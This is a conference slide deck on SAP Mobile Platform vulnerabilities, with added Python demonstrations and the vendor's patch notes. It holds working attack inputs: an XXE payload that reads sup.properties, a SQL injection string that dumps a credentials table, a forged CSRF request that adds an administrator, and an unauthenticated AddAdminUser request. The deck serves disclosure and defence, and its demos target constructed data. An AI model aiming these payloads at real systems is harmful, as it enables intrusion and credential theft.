Page 1: Attacks on SAP Mobile

Invest in security to secure investments

Attacks on SAP Mobile

Vahagn Vardanyan. ERPScan

Page 2: Attacks on SAP Mobile

Vahagn Vardanyan

SAP and Web application researcher

Specialist degree in information security


@vah_13

Page 3: Attacks on SAP Mobile

About ERPScan

• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP

• Leader by the number of acknowledgements from SAP ( 150+ )

• 60+ presentations at key security conferences worldwide

• 25 Awards and nominations

• Research team - 20 experts with experience in different areas of security

• Headquarters in Palo Alto (US) and Amsterdam (EU)


Page 4: Attacks on SAP Mobile

Agenda

• About SAP Mobile Platform
  – SAP Control Center
  – SAP SQL Anywhere services
  – SAP Mobile Server

• SAP Mobile Platform vulnerabilities
  – Decrypting the GIOP protocol
  – XXE in SAP Control Center
  – CSRF in SMP 3.0
  – Cassini 1.0
  – SQL Anywhere BoF
  – SAP EMR Unwired SQL injection

• Conclusion

Page 5: Attacks on SAP Mobile

SAP Mobile Platform


Page 6: Attacks on SAP Mobile

SMP architecture


Page 7: Attacks on SAP Mobile

SMP protocols

Protocol          SUP 2.1.3   SUP 2.2   SMP 2.3   SMP 3.0
SMP Messaging         x          x         x         x
SMP Replication       x          x         x         x
HTTP REST API                    x         x         x
SAP Agentry                                x         x

Page 8: Attacks on SAP Mobile

SMP services

SAP Control Center

SAP SQL Anywhere services

SAP Mobile Server


Page 9: Attacks on SAP Mobile

SAP Control Center

• Working process: sccservice.exe

• Open ports:
  – 2100 (Messaging service)
  – 8282/8283 (SCC)
  – 9999 (RMI)

Page 10: Attacks on SAP Mobile

SMP services

SAP Control Center

SAP SQL Anywhere services

SAP Mobile Server


Page 11: Attacks on SAP Mobile

SQL Anywhere

• Version 3: 1992

………………………….

• Version 10: 2006 - renamed SQL Anywhere (high availability, intra-query parallelism, materialized views)

• Version 11: 2008 (full text search, BlackBerry support)

• Version 12: 2010 (support for spatial data)

• Version 16: April 18, 2013 - (faster synchronization and improved security)


Page 12: Attacks on SAP Mobile

SQL Anywhere


Page 13: Attacks on SAP Mobile

SMP services

SAP Control Center

SAP SQL Anywhere services

SAP Mobile Server


Page 14: Attacks on SAP Mobile

SAP Mobile Server

• MobiLink

• AdminWebServices

• MlsrvWrapper

• InfoboxMultiplexer

• OBMO

• JMSBridge


Page 15: Attacks on SAP Mobile

SAP Mobile Server (MobiLink)


Page 16: Attacks on SAP Mobile

AdminWebServices

• Uses Cassini Web Server 1.0

• Listens on local port 5100

Page 17: Attacks on SAP Mobile

SAP Mobile Platform vulnerabilities


Page 18: Attacks on SAP Mobile

Decrypting the SAP Mobile Platform GIOP protocol


Page 19: Attacks on SAP Mobile

Decrypting the SAP Mobile Platform GIOP protocol

• GIOP (General Inter-ORB Protocol) is the abstract protocol by which object request brokers (ORBs) communicate

• In SMP it is spoken by mlsrv16.exe (MobiLink) on port 2000
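The slides that follow are screenshots of the decryption work and are not reproduced in this transcript. As an added example, not the author's tooling, the following Python decodes the GIOP framing that the MobiLink traffic on port 2000 is wrapped in, which is the step that has to happen before any payload can be looked at: the fixed 12-byte header (magic, version, byte-order/flags octet, message type, body length, with the length read in the byte order the header itself announces) and a carver that splits a reassembled TCP stream into individual messages. The sample stream is constructed inside the block and its bodies are placeholders, not real MobiLink payloads.

```python
from __future__ import annotations

import struct
from dataclasses import dataclass

# GIOP message types (byte 7 of the header, per the CORBA GIOP specification).
MESSAGE_TYPES = {
    0: "Request",
    1: "Reply",
    2: "CancelRequest",
    3: "LocateRequest",
    4: "LocateReply",
    5: "CloseConnection",
    6: "MessageError",
    7: "Fragment",   # GIOP 1.1 and later only
}

HEADER_LEN = 12


@dataclass
class GiopHeader:
    major: int
    minor: int
    little_endian: bool
    more_fragments: bool
    message_type: str
    body_length: int


def parse_giop_header(data: bytes) -> GiopHeader:
    """Decode the fixed 12-byte GIOP header at the start of `data`."""
    if len(data) < HEADER_LEN:
        raise ValueError("need %d bytes for a GIOP header, got %d" % (HEADER_LEN, len(data)))
    if data[:4] != b"GIOP":
        raise ValueError("bad magic %r" % (data[:4],))
    major, minor, flags, msg_type = struct.unpack_from("BBBB", data, 4)
    # Byte 6 is `byte_order` (0 = big, 1 = little) in GIOP 1.0 and a flags
    # octet in 1.1+: bit 0 = little endian, bit 1 = more fragments follow.
    little_endian = bool(flags & 0x01)
    more_fragments = bool(flags & 0x02) if (major, minor) >= (1, 1) else False
    if msg_type not in MESSAGE_TYPES:
        raise ValueError("unknown GIOP message type %d" % msg_type)
    # message_size is encoded in the byte order the header announces.
    (body_length,) = struct.unpack_from("<I" if little_endian else ">I", data, 8)
    return GiopHeader(major, minor, little_endian, more_fragments,
                      MESSAGE_TYPES[msg_type], body_length)


def looks_like_giop(data: bytes) -> bool:
    """Cheap classifier for a captured stream: does it open with a valid header?"""
    try:
        parse_giop_header(data)
        return True
    except ValueError:
        return False


def split_giop_stream(stream: bytes) -> list[tuple[GiopHeader, bytes]]:
    """Carve back-to-back GIOP messages out of one direction of a reassembled
    TCP stream, e.g. the bytes a capture tool exported for the port 2000 flow."""
    messages = []
    offset = 0
    while offset < len(stream):
        header = parse_giop_header(stream[offset:offset + HEADER_LEN])
        start = offset + HEADER_LEN
        end = start + header.body_length
        if end > len(stream):
            raise ValueError("truncated GIOP message at offset %d" % offset)
        messages.append((header, stream[start:end]))
        offset = end
    return messages


def build_giop_message(msg_type: int, body: bytes, little_endian: bool = True,
                       version: tuple[int, int] = (1, 2)) -> bytes:
    """Frame `body` as a GIOP message; used here only to construct sample input."""
    flags = 0x01 if little_endian else 0x00
    size = struct.pack("<I" if little_endian else ">I", len(body))
    return b"GIOP" + bytes([version[0], version[1], flags, msg_type]) + size + body


# Constructed sample: a little-endian Request followed by a big-endian Reply.
# Bodies are placeholders; real MobiLink payloads are not reproduced here.
SAMPLE_STREAM = (build_giop_message(0, b"\x00" * 20)
                 + build_giop_message(1, b"\x01\x02\x03", little_endian=False))

if __name__ == "__main__":
    for header, body in split_giop_stream(SAMPLE_STREAM):
        print(header, len(body), "body bytes")
```

Once the stream is split into messages, each body still has to be decoded as CDR according to the message type (Request bodies carry the operation name and arguments); that per-operation decoding, and whatever protection the product layers on top of it, is what the screenshots in the deck cover.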

Page 20: Attacks on SAP Mobile

XXE in the SAP Mobile Platform portal page

CVE-2015-2813


Page 21: Attacks on SAP Mobile

XXE in the SAP Mobile Platform portal page…


Page 22: Attacks on SAP Mobile

XXE in the SAP Mobile Platform portal page…

• Portal URL: https://IP_ADDR:8283/scc

• web.xml & services-config.xml

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml

<servlet-mapping>
  <servlet-name>MessageBrokerServlet</servlet-name>
  <url-pattern>/messagebroker/*</url-pattern>
</servlet-mapping>

Page 23: Attacks on SAP Mobile

…XXE…

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml

<channel-definition id="scc-http" class="mx.messaging.channels.HTTPChannel">
  <endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"
            class="flex.messaging.endpoints.HTTPEndpoint" />
</channel-definition>

Message broker endpoints:

1. /scc/messagebroker/amfpolling
2. /scc/messagebroker/amfsecurepolling
3. /scc/messagebroker/http
4. /scc/messagebroker/httpsecure
5. /scc/messagebroker/amflongpolling

Page 24: Attacks on SAP Mobile

…XXE


Page 25: Attacks on SAP Mobile

Read file with XXE

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d

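As an added example, not the author's code, the following Python reproduces the file-read primitive in a self-contained way: it writes a constructed stand-in for sup.properties to a temporary file, builds an XML body whose DOCTYPE declares a SYSTEM entity pointing at that file, and parses the body twice with the standard library's xml.sax parser, once with external general entities enabled (the vulnerable configuration) and once disabled (the fix). The AMFX envelope that the /scc/messagebroker/http endpoint expects is not shown on the slides, so a bare <data> element stands in for it; the path, file content and element name are all assumptions of the example.

```python
import io
import os
import tempfile
import xml.sax
import xml.sax.handler

# Constructed stand-in for the sup.properties line shown on the slide; on a real
# SMP host the file sits under C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\...
SAMPLE_PROPERTIES = (
    b"sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d\n"
)


def build_xxe_document(target_path: str) -> bytes:
    """XML body whose root element expands an external entity to `target_path`.
    A bare <data> element stands in for the real request envelope (assumption)."""
    return (
        b'<?xml version="1.0"?>\n'
        b"<!DOCTYPE data [\n"
        b'  <!ENTITY xxe SYSTEM "' + target_path.encode() + b'">\n'
        b"]>\n"
        b"<data>&xxe;</data>\n"
    )


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data, i.e. whatever the entity expanded into."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text(document: bytes, resolve_external_entities: bool) -> str:
    """Parse `document` and return its concatenated text content.

    resolve_external_entities=True reproduces a parser that follows SYSTEM
    entities (the XXE condition); False is the hardened configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.parts).strip()


def demo() -> dict:
    """Drop the constructed properties file on disk, attack it with both parser
    configurations and return what each one leaked."""
    with tempfile.NamedTemporaryFile(delete=False, suffix=".properties") as fh:
        fh.write(SAMPLE_PROPERTIES)
        path = fh.name
    try:
        payload = build_xxe_document(path)
        return {
            "vulnerable": parse_text(payload, resolve_external_entities=True),
            "hardened": parse_text(payload, resolve_external_entities=False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, leaked in demo().items():
        print("%-10s -> %r" % (mode, leaked))
```

The difference between the two runs is a parser setting, not input filtering: the fix is to disable external general and parameter entities (or DTD processing altogether where the message format does not need it) in whatever parser handles the HTTP channel's XML, which is why this class of bug is closed by a server-side patch rather than by a WAF rule.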

Page 26: Attacks on SAP Mobile

Decrypt sup.imo.upa


Page 27: Attacks on SAP Mobile

SAP Mobile Platform unauthenticated access to other servlets

• Architecture and program vulnerabilities in SAP's J2EE engine (BlackHat USA 2011)

• web.xml files revealed hidden methods to:
  – Read and generate logs
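The hunt for "hidden" servlets can be made systematic. The following Python, an added example rather than anything from the talk, parses a web.xml, lists every servlet's url-patterns and flags those not covered by a security-constraint that carries an auth-constraint (under the Servlet specification a constraint without an auth-constraint grants access, so it protects nothing). The web.xml is constructed for the example: only the MessageBrokerServlet mapping is taken from the slide above; LogServlet, AdminServlet, their classes and the role name are made up.

```python
import xml.etree.ElementTree as ET

# Constructed deployment descriptor. Only the MessageBrokerServlet mapping comes
# from the deck; everything else is invented so the audit has something to find.
SAMPLE_WEB_XML = """
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <servlet>
    <servlet-name>MessageBrokerServlet</servlet-name>
    <servlet-class>flex.messaging.MessageBrokerServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>MessageBrokerServlet</servlet-name>
    <url-pattern>/messagebroker/*</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>LogServlet</servlet-name>
    <servlet-class>example.LogServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LogServlet</servlet-name>
    <url-pattern>/logs/read</url-pattern>
    <url-pattern>/logs/generate</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>AdminServlet</servlet-name>
    <servlet-class>example.AdminServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>AdminServlet</servlet-name>
    <url-pattern>/admin/*</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Admin</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace: '{http://...}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _text(elem, name) -> str:
    for c in _children(elem, name):
        return (c.text or "").strip()
    return ""


def servlet_mappings(web_xml: str) -> dict:
    """servlet-name -> list of url-patterns it is mapped to, in file order."""
    root = ET.fromstring(web_xml)
    mappings = {}
    for m in _children(root, "servlet-mapping"):
        name = _text(m, "servlet-name")
        for p in _children(m, "url-pattern"):
            mappings.setdefault(name, []).append((p.text or "").strip())
    return mappings


def constrained_patterns(web_xml: str) -> set:
    """url-patterns under a security-constraint that restricts access.
    A constraint with no <auth-constraint> permits access and is skipped."""
    root = ET.fromstring(web_xml)
    patterns = set()
    for sc in _children(root, "security-constraint"):
        if not _children(sc, "auth-constraint"):
            continue
        for wrc in _children(sc, "web-resource-collection"):
            for p in _children(wrc, "url-pattern"):
                patterns.add((p.text or "").strip())
    return patterns


def _covered(pattern: str, constraints: set) -> bool:
    """Exact match, or the mapping lies under a constrained '/prefix/*' path."""
    if pattern in constraints:
        return True
    return any(c.endswith("/*") and pattern.startswith(c[:-1]) for c in constraints)


def unprotected_servlets(web_xml: str) -> dict:
    """Servlets with at least one url-pattern outside every auth constraint:
    the candidates to request without credentials."""
    constraints = constrained_patterns(web_xml)
    result = {}
    for name, patterns in servlet_mappings(web_xml).items():
        open_patterns = [p for p in patterns if not _covered(p, constraints)]
        if open_patterns:
            result[name] = open_patterns
    return result
```

Treat the output as a triage list rather than a verdict: a servlet can enforce authentication in code instead of in the deployment descriptor, so every flagged path still has to be requested without a session to confirm it is really reachable.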

Page 28: Attacks on SAP Mobile

Prevention

Install SAP Security Note 2125358 (SAP Mobile Platform XXE vulnerability)

Page 29: Attacks on SAP Mobile

CSRF in SMP 3.0


Page 30: Attacks on SAP Mobile

CSRF in SMP 3.0


Page 31: Attacks on SAP Mobile

CSRF in SMP 3.0


Page 32: Attacks on SAP Mobile

CSRF in SMP 3.0

Affected operations:

• addAdministrator
• addRepository
• removeServerLogs
• createApplication
• createBackendConnection
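Each operation above changes server state, and the slides show them being triggered by a forged request. As an added example, not SAP's or the author's code, the following Python models one such operation twice: an unprotected handler that authorises on the session cookie alone, and a hardened one that also demands a synchronizer token bound to the session with an HMAC and checks the Origin header. The session id, origin, URL path and user names are constructed for the example.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed fixtures: one logged-in administrator session and the origin the
# portal is served from. None of these values come from the deck.
SESSIONS = {"sid-1234": "sccadmin"}
TRUSTED_ORIGINS = {"https://smp.example.internal:8283"}
SERVER_SECRET = secrets.token_bytes(32)   # per-deployment secret, regenerated on start
ADMINISTRATORS = set()


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session with an HMAC: unguessable, and
    worthless if replayed against a different session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _session_user(req: Request):
    return SESSIONS.get(req.cookies.get("JSESSIONID"))


def add_administrator_unprotected(req: Request) -> int:
    """Vulnerable: authorisation rests on the session cookie alone, which the
    victim's browser attaches to any POST an attacker's page submits."""
    if req.method != "POST" or _session_user(req) is None:
        return 401
    ADMINISTRATORS.add(req.form["name"])
    return 200


def add_administrator_protected(req: Request) -> int:
    """Hardened: a cross-site page can neither read the per-session token nor
    choose the Origin header the browser sends, so a forged request fails."""
    if req.method != "POST" or _session_user(req) is None:
        return 401
    origin = req.headers.get("Origin")
    if origin is not None and origin not in TRUSTED_ORIGINS:
        return 403
    expected = csrf_token(req.cookies["JSESSIONID"])
    if not hmac.compare_digest(req.form.get("csrf_token", ""), expected):
        return 403
    ADMINISTRATORS.add(req.form["name"])
    return 200


def forged_request() -> Request:
    """What the victim's browser sends when an attacker's page auto-submits a
    form: the cookie rides along, the token and Origin are outside attacker control."""
    return Request("POST", "/admin/addAdministrator",          # path is constructed
                   cookies={"JSESSIONID": "sid-1234"},
                   headers={"Origin": "https://attacker.example"},
                   form={"name": "backdoor"})


def legitimate_request() -> Request:
    """The same action submitted from the real portal page, token included."""
    return Request("POST", "/admin/addAdministrator",
                   cookies={"JSESSIONID": "sid-1234"},
                   headers={"Origin": "https://smp.example.internal:8283"},
                   form={"name": "newadmin", "csrf_token": csrf_token("sid-1234")})


if __name__ == "__main__":
    print("unprotected, forged :", add_administrator_unprotected(forged_request()))
    print("protected, forged   :", add_administrator_protected(forged_request()))
    print("protected, legit    :", add_administrator_protected(legitimate_request()))
```

The Origin check is a second line of defence, not the primary one: some clients omit the header, which is why a missing Origin falls through to the token check instead of being rejected outright. The token must be tied to the session so that one token captured from, or issued to, an attacker cannot be replayed against other administrators' sessions.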

Page 33: Attacks on SAP Mobile

Prevention

Install SAP Security Note 2114316 (SAP Mobile Platform CSRF vulnerability)

Page 34: Attacks on SAP Mobile

Cassini 1.0


Page 35: Attacks on SAP Mobile

AdminWebService

POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: length

strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100

Page 36: Attacks on SAP Mobile

AdminWebService


Page 37: Attacks on SAP Mobile

SAP SQL Anywhere Buffer Overflow/Code Execution

CVE-2015-2819


Page 38: Attacks on SAP Mobile

SAP SQL Anywhere BoF/Code Execution

• CVE-2008-0912 – The MobiLink server is affected by a heap overflow that occurs while handling strings such as the username, version and remote ID (all pre-authentication) when they are longer than 128 bytes

• CVE-2014-9264 – Stack-based buffer overflow in the .NET Data Provider in SAP SQL Anywhere allows remote attackers to execute arbitrary code via a crafted column alias

Page 39: Attacks on SAP Mobile

First PSH request


Page 40: Attacks on SAP Mobile

First PSH request


Page 41: Attacks on SAP Mobile

SQL Anywhere BoF


Page 42: Attacks on SAP Mobile

Prevention

Install SAP Security Note 2108161 (Denial of service in SAP SQL Anywhere)

Page 43: Attacks on SAP Mobile

SAP EMR Unwired SQL injection

CVE-2013-7096


Page 44: Attacks on SAP Mobile

SAP EMR Unwired SQL injection

• CVE-2013-7096 (CVSS 7.5)

• AndroidManifest.xml:

<provider android:name=".providers.ModiDataDbProvider"
          android:authorities="com.sap.mobi.docsprovider" />

(No android:exported attribute: for an app targeting API level 16 or lower a content provider is exported by default, so every other app on the device can query it.)

Content URIs served by the provider:

1. content://com.sap.mobi.docsprovider/documents/offline_cat
2. content://com.sap.mobi.docsprovider/documents/offline/
3. content://com.sap.mobi.docsprovider/documents/sample
4. content://com.sap.mobi.docsprovider/documents/online
5. content://com.sap.mobi.docsprovider/documents/offline_auth
6. content://com.sap.mobi.docsprovider/documents/offline
7. content://com.sap.mobi.docsprovider/documents/online_auth
8. content://com.sap.mobi.docsprovider/documents/sample/
9. content://com.sap.mobi.docsprovider/documents/online_cat
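As an added example, not the application's code, the following Python re-creates the flaw class with sqlite3: a query function that splices the caller's selection string into its SQL, the way a content provider's query() does when it passes the selection argument straight through, beside a version that binds the caller's value as a parameter. The schema, rows and credentials table are constructed; on the device the caller would be any other app querying one of the content://com.sap.mobi.docsprovider/documents/... URIs above through the ContentResolver.

```python
import sqlite3

# Constructed schema standing in for the provider's database: the documents
# table the URIs are meant to expose, and a credentials table they are not.
SCHEMA = """
CREATE TABLE documents (id INTEGER PRIMARY KEY, name TEXT NOT NULL, mode TEXT NOT NULL);
CREATE TABLE offline_auth (id INTEGER PRIMARY KEY, username TEXT NOT NULL, token TEXT NOT NULL);
INSERT INTO documents (name, mode) VALUES ('Q1 report', 'offline'), ('Sales dashboard', 'online');
INSERT INTO offline_auth (username, token) VALUES ('alice', 'tok-a1b2c3'), ('bob', 'tok-d4e5f6');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_documents_vulnerable(conn: sqlite3.Connection, selection: str) -> list:
    """Mirrors a ContentProvider.query() that splices the caller's `selection`
    into the statement. The caller is another app; the string is attacker input."""
    sql = "SELECT name FROM documents WHERE mode = 'offline' AND (" + selection + ")"
    return [row[0] for row in conn.execute(sql)]


def query_documents_hardened(conn: sqlite3.Connection, name: str) -> list:
    """The caller supplies a value that is bound as a parameter; the SQL text is
    fixed, so nothing in the input can reach other tables or clauses."""
    sql = "SELECT name FROM documents WHERE mode = 'offline' AND name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# A selection a malicious app might pass: closes the provider's parenthesis,
# unions in the credentials table and comments out the rest of the statement.
INJECTED_SELECTION = "1=0) UNION SELECT username || ':' || token FROM offline_auth -- "


def demo() -> dict:
    """Run a legitimate selection and the injected one against both versions."""
    conn = make_db()
    return {
        "legit": query_documents_vulnerable(conn, "name = 'Q1 report'"),
        "injected_vulnerable": sorted(query_documents_vulnerable(conn, INJECTED_SELECTION)),
        "injected_hardened": query_documents_hardened(conn, INJECTED_SELECTION),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print("%-20s %r" % (label, rows))
```

The same principle applies inside the provider: pass caller input only through selectionArgs bound to ? placeholders (SQLiteQueryBuilder.setStrict(true), available from API level 28, enforces this for the selection clause), restrict the projection to a fixed column list, and mark providers that other apps have no business calling with android:exported="false" or a permission, since the injection only matters because the component is reachable in the first place.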

Page 45: Attacks on SAP Mobile

Prevention

Install SAP Security Note 1864518 (Security Improvements for MOB-APP-EMR-AND)

Page 46: Attacks on SAP Mobile

Conclusion

• SAP Guides

• Regular security assessments

• Monitoring technical security

• Segregation of Duties

• Security events monitoring

Page 47: Attacks on SAP Mobile

Each SAP landscape is unique and we pay close attention to the requirements of our customers and prospects. The ERPScan development team constantly addresses these specific needs and is actively involved in product advancement. If you wish to know whether our scanner addresses a particular aspect, or simply have a feature wish list, please e-mail us. We will be glad to consider your suggestions for future releases or monthly updates.

About

USA HQ: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301

EU HQ: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam

www.erpscan.com [email protected]